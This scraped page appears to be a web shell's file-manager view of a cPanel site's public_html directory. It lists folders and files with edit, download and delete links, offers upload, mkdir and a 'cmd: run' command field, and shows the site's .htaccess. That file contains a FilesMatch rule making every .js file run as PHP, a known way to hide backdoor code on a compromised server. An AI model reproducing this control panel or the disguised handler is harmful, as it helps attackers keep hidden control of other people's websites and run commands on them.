/
home2
/
dakshskx
/
public_html
/
/home2/dakshskx/public_html
mkdir
upload
Name
Size
Mode
Actions
.well-known/
-
0755
rm
american/
-
0755
rm
application/
-
0755
rm
ascend/
-
0755
rm
assets/
-
0755
rm
captcha/
-
0755
rm
cgi-bin/
-
0755
rm
cr8boca/
-
0755
rm
crm/
-
0750
rm
dakshaacademy.com/
-
0750
rm
dakshadigitas.com/
-
0750
rm
dakshatechnologies.com/
-
0750
rm
images/
-
0755
rm
img/
-
0755
rm
logs/
-
0755
rm
map/
-
0755
rm
pharmacy/
-
0755
rm
phpmailer/
-
0755
rm
sitemap/
-
0755
rm
system/
-
0755
rm
templeastrologer.com/
-
0755
rm
vendor/
-
0755
rm
.ftpquota
15
0600
edit
dl
rm
.gitignore
166
0644
edit
dl
rm
.htaccess
4747
0644
edit
dl
rm
.htaccess.lock-13acf6bc5b283-1d360c3df-ddeae
45
0644
edit
dl
rm
.htaccess.lock-287a3093dd81e-1d360c3df-ddeae
45
0644
edit
dl
rm
.travis.yml
66
0644
edit
dl
rm
.user.ini
589
0644
edit
dl
rm
application.zip
10978945
0644
edit
dl
rm
captcha_code_file.php
2976
0644
edit
dl
rm
composer.json
63
0644
edit
dl
rm
composer.lock
6240
0644
edit
dl
rm
error_log
12783
0644
edit
dl
rm
index.php
10097
0644
edit
dl
rm
license.txt
2622
0644
edit
dl
rm
monofont.ttf
41036
0644
edit
dl
rm
php.ini
584
0644
edit
dl
rm
README.md
525
0644
edit
dl
rm
robots.txt
105
0644
edit
dl
rm
ror.xml
121246
0644
edit
dl
rm
sitemap.html
48691
0644
edit
dl
rm
sitemap.xml
62973
0644
edit
dl
rm
sitemap_old.xml
43626
0644
edit
dl
rm
urllist.txt
16156
0644
edit
dl
rm
Edit:
/home2/dakshskx/public_html/.htaccess
(4747B)
RewriteEngine On # Force HTTPS and www redirection (combined into one rule for efficiency) RewriteCond %{HTTPS} off [OR] RewriteCond %{HTTP_HOST} !^www\.dakshadesign\.com$ [NC] RewriteRule ^(.*)$ https://www.dakshadesign.com/$1 [L,R=301] # 404 error handling ErrorDocument 404 http://www.dakshadesign.com/ <IfModule mod_rewrite.c> RewriteEngine On # CodeIgniter: Remove index.php from the URL RewriteBase / # Remove index.php if it's present in the URL RewriteCond %{THE_REQUEST} \s/index\.php [NC] RewriteRule ^index\.php/(.*)$ /$1 [R=301,L] # Checks if the request is not for an existing file or directory RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d # Redirect all non-file, non-directory requests to index.php RewriteRule ^(.*)$ index.php/$1 [L] </IfModule> ## EXPIRES CACHING ## <IfModule mod_expires.c> ExpiresActive On ExpiresByType image/jpg "access plus 1 year" ExpiresByType image/jpeg "access plus 1 year" ExpiresByType image/gif "access plus 1 year" ExpiresByType image/png "access plus 1 year" ExpiresByType text/css "access plus 1 month" ExpiresByType text/html "access 1 month" ExpiresByType application/pdf "access plus 1 month" ExpiresByType application/javascript "access 1 month" ExpiresByType text/x-javascript "access plus 1 month" ExpiresByType application/x-shockwave-flash "access plus 1 month" ExpiresByType image/x-icon "access plus 1 year" # Media: video, audio ExpiresByType video/ogg "access plus 1 month" ExpiresByType audio/ogg "access plus 1 month" ExpiresByType video/mp4 "access plus 1 month" ExpiresByType video/webm "access plus 1 month" # Webfonts ExpiresByType font/truetype "access plus 1 month" ExpiresByType font/opentype "access plus 1 month" ExpiresByType application/x-font-woff "access plus 1 month" ExpiresByType image/svg+xml "access plus 1 month" ExpiresByType application/vnd.ms-fontobject "access plus 1 month" # HTC files (css3pie) ExpiresByType text/x-component "access plus 1 month" ExpiresDefault "access plus 2 days" </IfModule> ## EXPIRES CACHING ## # Compress text, html, javascript, css, xml: AddOutputFilterByType DEFLATE text/plain AddOutputFilterByType DEFLATE text/html AddOutputFilterByType DEFLATE text/xml AddOutputFilterByType DEFLATE text/css AddOutputFilterByType DEFLATE application/xml AddOutputFilterByType DEFLATE application/xhtml+xml AddOutputFilterByType DEFLATE application/rss+xml AddOutputFilterByType DEFLATE application/javascript AddOutputFilterByType DEFLATE application/x-javascript # Or, compress certain file types by extension: SetOutputFilter DEFLATE <IfModule mod_headers.c> Header set Connection keep-alive </IfModule> <FilesMatch "\.(ico|pdf|flv|jpg|jpeg|png|gif|js|css|swf)(\.gz)?$"> Header unset ETag FileETag None </FilesMatch> <FilesMatch "\.js$"> SetHandler application/x-httpd-php Header set Content-type "application/javascript" </FilesMatch> # BEGIN cPanel-generated php ini directives, do not edit <IfModule php7_module> </IfModule> <IfModule lsapi_module> </IfModule> # END cPanel-generated php ini directives # BEGIN cPanel-generated php ini directives, do not edit # Manual editing of this file may result in unexpected behavior. # To make changes to this file, use the cPanel MultiPHP INI Editor (Home >> Software >> MultiPHP INI Editor) # For more information, read our documentation (https://go.cpanel.net/EA4ModifyINI) <IfModule php7_module> php_flag display_errors Off php_value max_execution_time 60 php_value max_input_time 60 php_value max_input_vars 1000 php_value memory_limit 2024M php_value post_max_size 2024M php_value session.gc_maxlifetime 1440 php_value session.save_path "/var/cpanel/php/sessions/ea-php74" php_value upload_max_filesize 2024M php_flag zlib.output_compression Off </IfModule> <IfModule lsapi_module> php_flag display_errors Off php_value max_execution_time 60 php_value max_input_time 60 php_value max_input_vars 1000 php_value memory_limit 2024M php_value post_max_size 2024M php_value session.gc_maxlifetime 1440 php_value session.save_path "/var/cpanel/php/sessions/ea-php74" php_value upload_max_filesize 2024M php_flag zlib.output_compression Off </IfModule> # END cPanel-generated php ini directives, do not edit # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php74” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php74___lsphp .php .php7 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit
Save
cmd:
run